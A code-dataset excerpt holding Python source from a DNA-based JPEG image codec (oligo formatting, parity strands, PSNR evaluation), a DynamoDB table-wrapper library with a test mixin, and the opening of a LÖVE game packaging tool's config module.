self.dc_freq_len = 0
self.ac_freq_len = 0
self.general_info_formatter.dc_freq_len = 0
self.general_info_formatter.ac_freq_len = 0
self.frequency_formatter.dc_freq_len = 0
self.frequency_formatter.ac_freq_len = 0
self.max_cat = self.DEFAULT_MAX_CAT
self.max_runcat = self.DEFAULT_MAX_RUNCAT
self.general_info_formatter.max_cat = self.DEFAULT_MAX_CAT
self.general_info_formatter.max_runcat = self.DEFAULT_MAX_RUNCAT
self.frequency_formatter.max_cat = self.DEFAULT_MAX_CAT
self.frequency_formatter.max_runcat = self.DEFAULT_MAX_RUNCAT
def set_state(self, *args, case=None):
if case == "format":
if len(args) < 3:
raise ValueError("Wrong argument number")
self.set_freq_origin(args[0])
self.m = args[1]
self.n = args[2]
self.general_info_formatter.m = args[1]
self.general_info_formatter.n = args[2]
if self.freq_origin == "from_img":
if len(args) != 5:
raise ValueError("Wrong argument number")
if isinstance(args[3], tuple) and isinstance(args[4], tuple):
self.freq_dc = (args[3][0].astype(int),
args[3][1].astype(int),
args[3][2].astype(int))
self.freq_ac = (args[4][0].astype(int),
args[4][1].astype(int),
args[4][2].astype(int))
else:
self.freq_dc = args[3].astype(int)
self.freq_ac = args[4].astype(int)
else:
raise ValueError
def get_state(self, case=None):
if case == "deformat":
return self.alpha, self.m, self.n, self.freq_dc, self.freq_ac
else:
raise ValueError
def full_format(self, inp, *args):
self.set_state(*args, case="format")
oligos = self.format(inp)
if self.debug:
for oligo in oligos:
print(oligo)
return oligos
def full_deformat(self, oligos, *args):
data_strand = self.deformat(oligos)
return data_strand, self.get_state(case="deformat")
def format(self, inp):
oligos = ([self.general_info_formatter.format(None)] +
self.frequency_formatter.format((self.freq_dc, self.freq_ac)) +
self.data_formatter.format(inp))
if self.debug:
for oligo in oligos:
print(oligo)
return self.add_primers_and_sense(self.add_ids(oligos, self.centering_offset))
def deformat(self, oligos):
oligos_cleanup = [None] * len(oligos)
for i, oligo in enumerate(oligos):
oligos_cleanup[i] = ""
for char in oligo:
if char in ["A", "T", "C", "G"]:
oligos_cleanup[i] += char
if self.debug:
for oligo in oligos_cleanup:
print(oligo)
payload_strands = self.get_payload(oligos_cleanup)
general_info_strand, freq_strands, data_strands = None, [], []
for strand in payload_strands:
header = strand[:7]
substrand = strand[7:]
if self.debug:
print("\033[33m" + header + "\033[0m" + substrand)
if "\033[33m" + header + "\033[0m" == self.general_info_header:
general_info_strand = substrand
elif "\033[33m" + header + "\033[0m" == self.freqs_info_header:
freq_strands.append(substrand)
elif "\033[33m" + header + "\033[0m" == self.data_info_header:
data_strands.append(substrand)
else:
raise ValueError("Wrong header")
else:
if header == self.general_info_header:
general_info_strand = substrand
elif header == self.freqs_info_header:
freq_strands.append(substrand)
elif header == self.data_info_header:
data_strands.append(substrand)
else:
raise ValueError("Wrong header")
# General info
self.general_info_formatter.deformat(general_info_strand)
self.image_type = self.general_info_formatter.IMAGE_TYPES[self.general_info_formatter.image_type]
self.sampler = self.general_info_formatter.sampler
if self.image_type == "gray":
self.frequency_formatter = GrayFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=self.debug)
elif self.image_type == "RGB":
self.DEFAULT_MAX_CAT = 11 * 3 # pylint: disable = invalid-name
self.DEFAULT_MAX_RUNCAT = 162 * 3 # pylint: disable = invalid-name
self.frequency_formatter = RGBFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=self.debug)
self.freq_origin = self.general_info_formatter.freq_origin
self.alpha = self.general_info_formatter.alpha
self.blockdims = self.general_info_formatter.blockdims
self.m, self.n = self.general_info_formatter.m, self.general_info_formatter.n
# Frequencies
if self.freq_origin == "from_img":
self.max_cat = self.general_info_formatter.max_cat
self.max_runcat = self.general_info_formatter.max_runcat
self.dc_freq_len = self.general_info_formatter.dc_freq_len
self.ac_freq_len = self.general_info_formatter.ac_freq_len
self.frequency_formatter.dc_freq_len = self.general_info_formatter.dc_freq_len
self.frequency_formatter.ac_freq_len = self.general_info_formatter.ac_freq_len
self.frequency_formatter.max_cat = self.general_info_formatter.max_cat
self.frequency_formatter.max_runcat = self.general_info_formatter.max_runcat
(self.freq_dc, self.freq_ac) = self.frequency_formatter.deformat(freq_strands)
if self.debug:
print(f"DC frequencies : {self.freq_dc}")
print(f"AC frequencies : {self.freq_ac}")
#if RGB
elif self.DEFAULT_MAX_CAT == 33 and self.DEFAULT_MAX_RUNCAT == 162*3:
self.freq_ac = (None, None, None)
self.freq_dc = (None, None, None)
# Data strand
data_strand = self.data_formatter.deformat(data_strands)
if self.debug:
print(f"Data strand: {data_strand}")
return data_strand
def add_ids(self, oligos, n):
"""Adding primers to formatted oligos
:param oligos: list of formatted oligos without offset
:type oligos: list
:return: list of oligos with offset added at the beginning of each oligo
:rtpye: list
"""
res = []
for el in oligos:
el1, el2 = self.cut_payload(el, n)
if self.debug:
res.append(el1 + "\033[34m" + self.image_id + "\033[35m" + self.add_parity_strand(el, self.image_id, self.add_sense_nt('end')) + el2)
else:
res.append(el1 + self.image_id + self.add_parity_strand(el, self.image_id, self.add_sense_nt('end')) + el2)
return res
def add_primers_and_sense(self, oligos):
"""Adding primers to formatted oligos
:param oligos: list of formatted oligos without primers
:type oligos: list
:return: list of oligos with primers added at the beginning and at the end of each oligo
        :rtype: list
"""
res = []
for el in oligos:
if self.debug:
res.append(self.primer[0] + "\033[0;32m" + self.add_sense_nt("begin") + "\033[0m" + el + "\033[0;32m" + self.add_sense_nt("end") + "\033[0m" + self.primer[1])
else:
res.append(self.primer[0] + self.add_sense_nt("begin") + el + self.add_sense_nt("end") + self.primer[1])
return res
def get_payload(self, oligos):
"""Taking primers and sense nts off formatted oligos
        :param oligos: list of formatted oligos with primers and sense nucleotides
        :type oligos: list
        :return: list of payload strands with primers, sense nucleotides, image id and parity removed
        :rtype: list
"""
res = []
payload_strands = []
if self.debug:
for oligo in oligos:
payload_strands.append(oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49):-(compute_length(self.primer[1])+1)] +
oligo[compute_length(self.primer[0])+1:compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58)])
res.append("\033[31m" + oligo[:compute_length(self.primer[0])] +
"\033[32m" + oligo[compute_length(self.primer[0])] +
"\033[0m" + oligo[compute_length(self.primer[0])+1:
compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58)] +
"\033[34m" + oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58):
compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 53)] +
"\033[35m" + oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 53):
compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49)] +
"\033[0m" + oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49):
-(compute_length(self.primer[1])+1)] +
"\033[32m" + oligo[-(compute_length(self.primer[1])+1)] +
"\033[31m" + oligo[-(compute_length(self.primer[1])):] + "\033[0m")
else:
for oligo in oligos:
payload_strands.append(oligo[len(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49):-(len(self.primer[1])+1)] +
oligo[len(self.primer[0])+1:len(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58)])
if self.debug:
for oligo in res:
print(oligo)
return payload_strands
def add_sense_nt(self, pos):
"""Compute the sens nucleotide either the beginning one or the ending one
:param pos: either "begin" or "end", position of the sense nt to compute
:type pos: str
:returns: sense nucleotide
:rtype: str
"""
if pos == "begin":
if self.primer[0][-1] == "A":
return "T"
return "A"
elif pos == "end":
if self.primer[1][0] == "C":
return "G"
return "C"
else:
raise ValueError
def add_parity_strand(self, data, image_id, sense_nt):
"""Computes the parity strand for the current oligo
:param data: strand on which to compute parities for each base
:type data: str
:param image_id: id of the image
:type image_id: str
        :param sense_nt: sense nucleotide
        :type sense_nt: str
"""
parity = [data.count("A")%2,
data.count("T")%2,
data.count("C")%2,
data.count("G")%2]
strand = [None]*4
# First element
if parity[0] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if image_id[-1] != first_candidate:
strand[0] = first_candidate
else:
strand[0] = second_candidate
# Last element
if parity[-1] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if sense_nt != first_candidate:
strand[-1] = first_candidate
else:
strand[-1] = second_candidate
#Middle elements : case with different parities (simple)
if parity[1] != parity[2]:
# Second element
if parity[1] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[0] != first_candidate:
strand[1] = first_candidate
else:
strand[1] = second_candidate
# Third element
if parity[2] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[3] != first_candidate:
strand[2] = first_candidate
else:
strand[2] = second_candidate
# Middle elements: case with same parities (hard)
else:
if parity[0] == parity[-1] or parity[0] == parity[1]:
if parity[1] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[0] != first_candidate:
strand[1] = first_candidate
else:
strand[1] = second_candidate
if strand[1] != first_candidate:
strand[2] = first_candidate
else:
strand[2] = second_candidate
else:
if parity[2] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[3] != first_candidate:
strand[2] = first_candidate
else:
strand[2] = second_candidate
if strand[2] != first_candidate:
strand[1] = first_candidate
else:
strand[1] = second_candidate
return "".join(strand)
def cut_payload(self, el, n):
"""Cuts the payoad in two halves after the n-th nucleotide
:param el: Stand to be cut
:type el: string
:returns: Two cuts
:rtype: Tuple(string)
"""
count = 0
pos = 0
for char in el:
pos += 1
if char in ["A", "T", "C", "G"]:
count += 1
if count == n:
break
return el[pos:], el[:pos]
```
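A hedged sketch of the per-base parity idea behind `add_parity_strand`: each of the four parity nucleotides reflects whether the count of A, T, C or G in the payload is even or odd (even parities are drawn from {A, T}, odd ones from {C, G}), and the candidate-swapping logic in the method then avoids repeating the neighbouring base such as the last image-id nucleotide or the sense nucleotide.

```python
data = "AATTCG"
parity = [data.count(b) % 2 for b in "ATCG"]
print(parity)  # [0, 0, 1, 1] -> A/T counts even, C/G counts odd
# even parity -> parity base chosen from {"A", "T"}
# odd parity  -> parity base chosen from {"C", "G"}
```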
#### File: jpegdna/scripts/jpegdna_eval.py
```python
from pathlib import Path
from dataclasses import make_dataclass
import math
import pickle
from skimage import io
import pandas as pd
from pandas import ExcelWriter
import jpegdna
from jpegdna.codecs import JPEGDNAGray
# Choose between "from_img" and "default" for the frequencies
CHOICE = "from_img"
# Enables formatting (if True, bit-rate will be estimated with format taken into account)
FORMATTING = True
def stats(func):
"""Stats printing and exception handling decorator"""
def inner(*args):
try:
code, decoded = func(*args)
except ValueError as err:
print(err)
else:
if FORMATTING:
code_length = 0
for el in code:
code_length += len(el)
compression_rate = 8 * args[0].shape[0] * args[0].shape[1] / code_length
else:
compression_rate = 8 * args[0].shape[0] * args[0].shape[1] / len(code)
diff = (args[0].astype(int)-decoded.astype(int))
# plt.imshow(decoded, cmap='gray')
# plt.show()
mean_squarred_error = 0
for i in range(len(diff)):
for j in range(len(diff[0])):
mean_squarred_error += diff[i, j]**2
mean_squarred_error /= len(diff)
mean_squarred_error /= len(diff[0])
psnr = 10 * math.log10((255*255)/mean_squarred_error)
print(f"Mean squared error: {mean_squarred_error}")
print(f"PSNR: {psnr}")
print(f"Compression rate: {compression_rate} bits/nt")
# io.imsave(str(compression_rate) + ".png", decoded)
return compression_rate, psnr
return inner
def encode_decode(img, alpha):
"""Function for encoding and decoding"""
# Coding
codec = JPEGDNAGray(alpha, formatting=FORMATTING, verbose=False, verbosity=3)
if CHOICE == "from_img":
if FORMATTING:
oligos = codec.full_encode(img, "from_img")
else:
(code, res) = codec.full_encode(img, "from_img")
elif CHOICE == "from_file":
with open(Path(jpegdna.__path__[0] + "/data/freqs.pkl"), "rb") as file:
freqs = pickle.load(file)
(code, res) = codec.full_encode(img, "from_file", freqs['freq_dc'], freqs['freq_ac'])
elif CHOICE == "default":
if FORMATTING:
oligos = codec.full_encode(img, "default")
else:
(code, res) = codec.full_encode(img, "default")
# Decoding
codec2 = JPEGDNAGray(alpha, formatting=FORMATTING, verbose=False, verbosity=3)
if CHOICE == "from_img":
if FORMATTING:
decoded = codec2.full_decode(oligos, "from_img")
else:
decoded = codec2.full_decode(code, "from_img", res[1], res[2], res[3], res[4])
elif CHOICE == "from_file":
with open(Path(jpegdna.__path__[0] + "/data/freqs.pkl"), "rb") as file:
freqs = pickle.load(file)
decoded = codec2.full_decode(code, "from_file", res[1], res[2], freqs['freq_dc'], freqs['freq_ac'])
elif CHOICE == "default":
if FORMATTING:
decoded = codec2.full_decode(oligos, "default")
else:
decoded = codec2.full_decode(code, "default", res[1], res[2])
if FORMATTING:
return oligos, decoded
return code, decoded
@stats
def experiment(img, alpha):
"""Full experiment with stats and exception handling"""
return encode_decode(img, alpha)
# pylint: disable=missing-function-docstring
def main():
value = make_dataclass("value", [("Compressionrate", float), ("PSNR", float)])
general_results = []
img_names = ["kodim_gray_1.png", "kodim_gray_2.png", "kodim_gray_3.png", "kodim_gray_4.png", "kodim_gray_5.png"]
for i in range(len(img_names)):
img_name = img_names[i]
img = io.imread(Path(jpegdna.__path__[0] + "/../img/" + img_name))
values = []
for alpha in [1e-5, 0.145, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]:
print("==================================")
print(f"Alpha: {alpha}")
res = experiment(img, alpha)
if res is not None:
compression_rate, psnr = res
values.append(value(compression_rate, psnr))
general_results.append(values)
with ExcelWriter("res/results.xlsx") as writer: # pylint: disable=abstract-class-instantiated
for i in range(len(general_results)):
dtf = pd.DataFrame(general_results[i])
dtf.to_excel(writer, sheet_name=img_names[i], index=None, header=True)
# pylint: enable=missing-function-docstring
if __name__ == '__main__':
main()
```
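The nested-loop MSE/PSNR computation inside `stats` can be expressed more compactly with NumPy; a sketch (not part of the original script) that should produce the same numbers for 8-bit images:

```python
import math
import numpy as np

def psnr(original, decoded):
    """Peak signal-to-noise ratio between two 8-bit images."""
    diff = original.astype(int) - decoded.astype(int)
    mse = np.mean(diff.astype(float) ** 2)
    return 10 * math.log10((255 * 255) / mse)
```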
#### File: jpegdna/transforms/colortransform.py
```python
import cv2
from jpegdna.transforms import AbstractTransform
class RGBYCbCr(AbstractTransform):
"""RGB YCbCr color converter"""
def forward(self, inp):
"""Wrapper method to covert RGB to YCbCr
:param inp: Input image
:type inp: np.array
:return: YCbCr image
:rtype: np.array
"""
res = cv2.cvtColor(inp, cv2.COLOR_RGB2YCrCb)
res[:, :, 1], res[:, :, 2] = res[:, :, 2], res[:, :, 1].copy()
return res
def inverse(self, inp):
"""Wrapper method to covert YCbCr to RGB
:param inp: Input YCbCr image
:type inp: np.array
:return: RGB image
:rtype: np.array
"""
inp[:, :, 1], inp[:, :, 2] = inp[:, :, 2], inp[:, :, 1].copy()
return cv2.cvtColor(inp, cv2.COLOR_YCrCb2RGB)
``` |
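A short usage sketch of the converter (assumes OpenCV and NumPy are installed): `forward` swaps the Cr/Cb planes returned by OpenCV so that channel 1 is Cb and channel 2 is Cr, and `inverse` swaps them back before converting to RGB, so a round trip only differs by uint8 rounding.

```python
import numpy as np
from jpegdna.transforms.colortransform import RGBYCbCr

converter = RGBYCbCr()
rgb = np.random.randint(0, 256, size=(8, 8, 3), dtype=np.uint8)
ycbcr = converter.forward(rgb)       # channel order: Y, Cb, Cr
rgb_back = converter.inverse(ycbcr)  # note: modifies ycbcr in place
print(np.abs(rgb.astype(int) - rgb_back.astype(int)).max())  # small rounding error
```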
{
"source": "jiaaro/dynamesa",
"score": 2
} |
#### File: jiaaro/dynamesa/dynamesa.py
```python
import dataclasses
import functools
import operator
import unittest
from itertools import zip_longest
import typing as ty
import boto3 # type: ignore
# for easy access
from boto3.dynamodb.conditions import Key, Attr # type: ignore
# sentinal values
from botocore.exceptions import ClientError
class Sentinal:
def __init__(self, name):
self.name = name
def __repr__(self):
return f"<Sentinal: {self.name!r}>"
def __copy__(self):
return self
def __deepcopy__(self, memodict={}):
memodict[id(self)] = self
return self
PRIMARY_KEY = Sentinal("Primary Key")
REMOVE_KEY = Sentinal("Remove Key")
MISSING_KEY = Sentinal("Missing Key")
class DoesNotExist(Exception):
pass
def itemdict(item) -> ty.Dict:
if isinstance(item, dict):
d = item
elif hasattr(item, "asdict"):
d = item.asdict()
else:
d = dataclasses.asdict(item)
return {k: v for (k, v) in d.items() if v is not MISSING_KEY}
T = ty.TypeVar("T", ty.Dict[str, ty.Any], ty.Any)
class Table(ty.Generic[T]):
def __init__(self, table_name: str, item_type: ty.Type[T] = dict, **kwargs):
dynamodb = boto3.resource("dynamodb", **kwargs)
self.item_type: ty.Type[T] = item_type
self.table = dynamodb.Table(table_name)
self.DoesNotExist = type(f"DoesNotExist", (DoesNotExist,), {})
def __repr__(self):
return f"<Table: {self.table.name}>"
def __str__(self):
return f"{self.table.name} ({self.table.creation_date_time:%Y-%m-%d}, {self.table.item_count} items)"
def get(self, **kwargs) -> T:
dynamo_key = {}
for k in self.table.key_schema:
if k["AttributeName"] not in kwargs:
raise ValueError(
f"table.get was missing {k['KeyType']} key, {k['AttributeName']} for table {self.table.name}"
)
else:
dynamo_key[k["AttributeName"]] = kwargs[k["AttributeName"]]
unexpected_kwargs = set(kwargs.keys()) - set(dynamo_key.keys())
if unexpected_kwargs:
raise ValueError(f"table.get recieved unexpected keyword arguments: {unexpected_kwargs!r}")
item = self.table.get_item(Key=dynamo_key).get("Item")
if not item:
raise self.DoesNotExist(dynamo_key)
return self.item_type(**item)
def put(self, item: T) -> T:
self.table.put_item(Item=itemdict(item))
return item
def update(self, update: dict, return_values: str = "ALL_NEW") -> ty.Union[T, dict, None]:
"""
Takes a table and a dictionary of updates, extracts the primary key from the
update dict and applies the remaining keys as an update to the record.
Pass return_values="NONE" if you don't care what the resulting record is.
"""
table = self.table
orig_update = update
update = itemdict(update).copy()
pk = {}
for k in table.key_schema:
key = k["AttributeName"]
if key not in update:
raise ValueError(
f"Couldn't update {table.table_name} because update dict is missing the {k['KeyType']} key, {key:!r}"
)
pk[key] = update.pop(key)
if not update:
raise ValueError("There were no updates to apply, update dict contained only the primary key")
expression_attrs = {}
expression_vals = {}
set_parts = []
remove_parts = []
for i, (key, val) in enumerate(update.items()):
expression_attrs[f"#a{i}"] = key
if val is MISSING_KEY:
continue
elif val is REMOVE_KEY:
if isinstance(orig_update, dict):
orig_update.pop(key)
else:
setattr(orig_update, key, MISSING_KEY)
remove_parts.append(f"#a{i}")
else:
expression_vals[f":v{i}"] = val
set_parts.append(f"#a{i} = :v{i}")
update_expression = ""
if set_parts:
update_expression += "SET " + ", ".join(set_parts)
if remove_parts:
update_expression += " REMOVE " + ", ".join(remove_parts)
kwargs = {}
if expression_attrs:
kwargs["ExpressionAttributeNames"] = expression_attrs
if expression_vals:
kwargs["ExpressionAttributeValues"] = expression_vals
res = table.update_item(
Key=pk,
ReturnValues=return_values,
UpdateExpression=update_expression,
**kwargs,
)
item = res.get("Attributes")
if return_values == "ALL_NEW":
item = self.item_type(**item)
return item
def find(self, *args, **kwargs) -> ty.Generator[T, None, None]:
        # if the first arg is a string (or the PRIMARY_KEY sentinal), it's the name of the index to use
index_name = None
if args and (args[0] is PRIMARY_KEY or isinstance(args[0], str)):
index_name = args[0]
args = args[1:]
paginate_kwargs = {}
if index_name:
if index_name is not PRIMARY_KEY:
paginate_kwargs["IndexName"] = index_name
# When there is a positional arg after the index name, it's a key condition expression
if args and args[0]:
paginate_kwargs["KeyConditionExpression"] = args[0]
args = args[1:]
else:
if index_name is PRIMARY_KEY:
idx_key_schema = self.table.key_schema
else:
idx = next(idx for idx in self.table.global_secondary_indexes if idx["IndexName"] == index_name)
idx_key_schema = idx["KeySchema"]
idx_keys = {a["AttributeName"] for a in idx_key_schema}
paginate_kwargs["KeyConditionExpression"] = functools.reduce(
operator.and_, [Key(k).eq(kwargs[k]) for k in idx_keys]
)
filters = [Key(k).eq(v) for k, v in kwargs.items() if k not in idx_keys]
if args:
assert (
len(args) == 1
), "table.find takes at most 3 positional arguments: index name, key condition expression, and filter expression"
filters.append(args[0])
if filters:
paginate_kwargs["FilterExpression"] = functools.reduce(operator.and_, filters)
elif args or kwargs:
filters = [Key(k).eq(v) for k, v in kwargs.items()]
if args:
assert len(args) == 1
filters.append(args[0])
paginate_kwargs["FilterExpression"] = functools.reduce(operator.and_, filters)
client = self.table.meta.client
if index_name:
paginator = client.get_paginator("query").paginate(TableName=self.table.name, **paginate_kwargs)
else:
paginator = client.get_paginator("scan").paginate(TableName=self.table.name, **paginate_kwargs)
for page in paginator:
for item in page["Items"]:
yield self.item_type(**item)
def clear(self, *args, **kwargs) -> None:
with self.table.batch_writer() as batch:
for item in self.find(*args, **kwargs):
item = itemdict(item)
batch.delete_item(Key={k["AttributeName"]: item[k["AttributeName"]] for k in self.table.key_schema})
# Either (Hash key, type) or (hash key, hashkey type, range key, range key type)
DynamesaIndexType = ty.Union[ty.Tuple[str, str], ty.Tuple[str, str, str, str]]
class _TableGetter:
_resource_kwargs: ty.Dict[str, ty.Any] = {}
_tables: ty.Dict[ty.Tuple[str, ty.Type], Table] = {}
table_name_prefix: str = ""
def configure(self, **kwargs) -> None:
self._resource_kwargs.update(kwargs)
@property
def dynamodb(self):
return boto3.resource("dynamodb", **self._resource_kwargs)
def reload(self) -> None:
res = self.dynamodb.meta.client.list_tables()
self._tables = {}
for tablename in res["TableNames"]:
self._tables[tablename, dict] = Table(tablename, **self._resource_kwargs)
def create(
self,
table_name: str,
pk: DynamesaIndexType,
gsis: ty.Dict[str, DynamesaIndexType] = {},
lsis: ty.Dict[str, DynamesaIndexType] = {},
item_type: ty.Type[T] = dict,
) -> Table[T]:
prefixed_table_name = f"{self.table_name_prefix}{table_name}"
attribute_types = {}
def parse_index(idx: DynamesaIndexType) -> ty.List[ty.Dict[str, ty.Any]]:
assert len(idx) % 2 == 0
key_types = ("HASH", "RANGE")
index = []
for i, (k, dynamotype) in enumerate(zip_longest(*[iter(idx)] * 2)):
attribute_types[k] = dynamotype
index.append({"AttributeName": k, "KeyType": key_types[i]})
return index
create_kwargs = {}
create_kwargs["KeySchema"] = parse_index(pk)
for idx_name, idx_def in gsis.items():
create_kwargs.setdefault("GlobalSecondaryIndexes", [])
create_kwargs["GlobalSecondaryIndexes"].append(
{
"IndexName": idx_name,
"KeySchema": parse_index(idx_def),
"Projection": {"ProjectionType": "ALL"},
"ProvisionedThroughput": {"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
}
)
for idx_name, idx_def in lsis.items():
create_kwargs.setdefault("LocalSecondaryIndexes", [])
create_kwargs["LocalSecondaryIndexes"].append(
{
"IndexName": idx_name,
"KeySchema": parse_index(idx_def),
"Projection": {"ProjectionType": "ALL"},
"ProvisionedThroughput": {"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
}
)
table = self.dynamodb.create_table(
TableName=prefixed_table_name,
AttributeDefinitions=[{"AttributeName": k, "AttributeType": t} for k, t in attribute_types.items()],
ProvisionedThroughput={"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
**create_kwargs,
)
table.meta.client.get_waiter("table_exists").wait(TableName=prefixed_table_name)
return self.get(table_name, item_type)
def delete(self, table_name):
if isinstance(table_name, Table):
prefixed_table_name = table_name.table.name
else:
prefixed_table_name = f"{self.table_name_prefix}{table_name}"
self.dynamodb.meta.client.delete_table(TableName=prefixed_table_name)
self.dynamodb.meta.client.get_waiter("table_not_exists").wait(TableName=prefixed_table_name)
for table_key in list(self._tables.keys()):
if table_key[0] == prefixed_table_name:
self._tables.pop(table_key)
def get(self, table_name: str, item_type: ty.Type[T] = dict) -> Table[T]:
table_name = f"{self.table_name_prefix}{table_name}"
if (table_name, dict) not in self._tables:
self.reload()
if (table_name, item_type) in self._tables:
return self._tables[table_name, item_type]
table = Table(table_name, item_type=item_type, **self._resource_kwargs)
self._tables[table_name, item_type] = table
return table
def __getattr__(self, table_name) -> Table:
if not table_name.startswith("__"):
return self.get(table_name)
def __getitem__(self, table_name) -> Table:
return self.get(table_name)
def __iter__(self) -> ty.Iterator[Table]:
if not self._tables:
self.reload()
return iter(t for t in self._tables.values() if t.table.name.startswith(self.table_name_prefix))
def __len__(self):
if not self._tables:
self.reload()
return len(self._tables)
def __repr__(self):
max_table_name_len = max(len(t.table.name) for t in self)
return "Dynamesa Tables:\n" + "\n".join(
f" {t.table.name.ljust(max_table_name_len)} ({t.table.creation_date_time:%Y-%m-%d}, {t.table.item_count} items)"
for t in self
)
tables = _TableGetter()
configure = tables.configure
class DynamoUnitTestMixin(unittest.TestCase):
dynamesa_table_name_prefix: str = ""
dynamesa_tables = []
@classmethod
def setUpClass(cls) -> None:
global tables, configure
if hasattr(cls, "dynamesa_configure"):
cls._old_table_getter = tables
cls.tables = _TableGetter()
cls.tables.configure(**cls.dynamesa_configure)
tables = cls.tables
configure = tables.configure
else:
cls._old_table_getter = tables
cls.tables = tables
if not hasattr(cls, "_old_dynamesa_table_name_prefix"):
cls._old_dynamesa_table_name_prefix = tables.table_name_prefix
tables.table_name_prefix = cls.dynamesa_table_name_prefix
super().setUpClass()
@classmethod
def tearDownClass(cls) -> None:
global tables, configure
super().tearDownClass()
tables.dynamesa_table_name_prefix = cls._old_dynamesa_table_name_prefix
tables = cls._old_table_getter
configure = tables.configure
def setUp(self) -> None:
should_replace = None
def mktable(table):
if isinstance(table, (list, tuple)):
tables.create(*table)
elif isinstance(table, dict):
tables.create(**table)
for table in self.dynamesa_tables:
try:
mktable(table)
except ClientError as e:
if e.response["Error"]["Code"] != "ResourceInUseException":
raise
if should_replace is None:
replace_answer = input(
"Couldn't create tables. Would you like to delete existing tables and replace them? [yN]"
)
should_replace = replace_answer.lower() == "y"
if not should_replace:
raise
try:
table_name = table[0]
except (KeyError, IndexError, TypeError):
table_name = table.get("table_name")
tables.delete(table_name)
mktable(table)
if should_replace:
tables.reload()
super().setUp()
def tearDown(self) -> None:
super().tearDown()
for table in tables:
table.table.delete()
``` |
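A hedged usage sketch of the `Table` wrapper. The table name, its key name and the local DynamoDB endpoint are assumptions for illustration only; the table is assumed to already exist.

```python
from dynamesa import tables, configure, Attr, REMOVE_KEY

# assumes a "Users" table with hash key "pk" exists on a local endpoint
configure(endpoint_url="http://localhost:8000", region_name="us-east-1")

users = tables.get("Users")              # or: tables.Users / tables["Users"]
users.put({"pk": "user#1", "name": "Ada", "logins": 1})

item = users.get(pk="user#1")            # raises users.DoesNotExist if absent
users.update({"pk": "user#1", "logins": 2, "name": REMOVE_KEY})

for user in users.find(Attr("logins").gte(1)):   # scan with a filter expression
    print(user)
```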
{
"source": "jiaaro/makelove",
"score": 2
} |
#### File: makelove/makelove/config.py
```python
import os
import shutil
import subprocess
import sys
import re
import toml
from . import validators as val
from .util import prompt
default_config_name = "makelove.toml"
all_targets = ["win32", "win64", "appimage", "macos", "lovejs"]
all_love_versions = [
"11.3",
"11.2",
"11.1",
"11.0",
"0.10.2",
"0.10.1",
"0.10.0",
"0.9.2",
"0.9.1",
"0.9.0",
"0.8.0",
"0.7.2",
"0.7.1",
"0.7.0",
"0.6.2",
"0.6.1",
"0.6.0",
"0.5.0",
"0.4.0",
"0.3.2",
"0.3.1",
"0.3.0",
"0.2.1",
"0.2.0",
"0.1.1",
]
config_params = {
"name": val.String(),
"love_version": val.Choice(*all_love_versions),
"default_targets": val.List(val.Choice(*all_targets)),
"build_directory": val.Path(),
"icon_file": val.Path(),
"love_files": val.List(val.Path()),
"keep_game_directory": val.Bool(),
"archive_files": val.Dict(val.Path(), val.Path()),
"hooks": val.Section(
{
"prebuild": val.List(val.Command()),
"postbuild": val.List(val.Command()),
"parameters": val.Dict(val.Any(), val.Any()),
}
),
"windows": val.Section(
{
"exe_metadata": val.Dict(val.String(), val.String()),
"archive_files": val.Dict(val.Path(), val.Path()),
}
),
"win32": val.Section(
{
"love_binaries": val.Path(),
"shared_libraries": val.List(val.Path()),
"artifacts": val.ValueOrList(val.Choice("directory", "archive")),
}
),
"win64": val.Section(
{
"love_binaries": val.Path(),
"shared_libraries": val.List(val.Path()),
"artifacts": val.ValueOrList(val.Choice("directory", "archive")),
}
),
"linux": val.Section(
{"desktop_file_metadata": val.Dict(val.String(), val.String())}
),
"appimage": val.Section(
{
"source_appimage": val.Path(),
"shared_libraries": val.List(val.Path()),
"artifacts": val.ValueOrList(val.Choice("appdir", "appimage")),
}
),
"macos": val.Section(
{
"love_binaries": val.Path(),
"icon_file": val.Path(),
"app_metadata": val.Dict(val.String(), val.String()),
}
),
"lovejs": val.Section(
{
"title": val.String(),
"memory": val.String(),
}
),
}
def should_build_artifact(config, target, artifact, default):
if not target in config or not "artifacts" in config[target]:
return default
if artifact in config[target]["artifacts"]:
        return True
    return False
def load_config_file(path):
with open(path) as f:
config_data = toml.load(f)
validate_config(config_data)
return config_data
def is_inside_git_repo():
return (
subprocess.run(
["git", "rev-parse", "--is-inside-work-tree"], capture_output=True
).returncode
== 0
